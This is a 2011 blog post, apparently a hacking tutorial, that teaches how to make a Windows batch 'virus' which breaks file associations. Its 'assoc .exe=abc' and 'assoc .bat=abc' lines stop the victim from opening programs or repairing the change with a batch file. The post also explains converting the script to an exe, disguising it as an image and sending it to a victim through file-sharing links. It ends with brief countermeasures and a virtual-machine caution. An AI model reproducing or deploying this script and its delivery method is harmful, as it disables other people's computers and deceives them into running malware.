Friday, September 2, 2011

Virus that disables EXE files.

We know, all kinds of files opens with some specified programs, example video files can be opened with VLC player, in the same way exe files open with exefile program. This is called association, we say exe is associated with exefile. Now consider, somehow we managed to break this association, how deadly it could be, victim can never open any exe file(cmd, notepad, paint etc..).
To see association of files open command prompt and type:-                                                 assoc .<extension> example assoc .exe.

>assoc .bat <hit enter>
>.bat=batfile <result>
i.e bat file is associated with batfile.

Creating Process:-
1. Open Notepad and write the Program as given in the below examples and save it with .bat extension.
2. Convert this bat file to exe file using "bat to exe" converter. Click Here to download the tool.
3. Send this file to your victim and make him click, you can cover this file using image file, Click Here to learn hiding trick. Or you can upload this file in any file sharing website like ziddu.com or megaupload.com and give the link to your victim.

Note:- To create batch files follow the above "creating process".

Example Virus Break the association:

assoc .exe=abc     :: now exe file is associated with "abc" which does't exist.


Don't think that victim can't fix this problem, he can use .bat file to fix this problem, to fix this create bat file with code:

assoc .exe=exefile
In that case add more line in your virus program, check below:
assoc .exe=abc     :: now exe file is associated with "abc" which does't exist.
assoc .bat=abc     :: now bat file is associated with "abc" which does't exist.


Countermeasure:
1. Whenever we change the association, the registry file gets edited. So to recover from this attack the only thing we can do is, always keep backup of registry.
To create registry backup go to start->run->type regedit. You will get registry editor window inside that go to file menu->export and choose a location to save.
2. Edit the registry to correct the file association. If you don't know how to edit, download the registry settings for important file types. Click Here to download the settings.



Precaution:
Do not practice these tricks in your PC, use virtual machine in your PC to make and run these virus. One such virtual machine is Sun VirtualBox. Click Here to download.
After installing this Virtual Box install XP or 7 inside it(installing procedure is same). 

No comments:

Post a Comment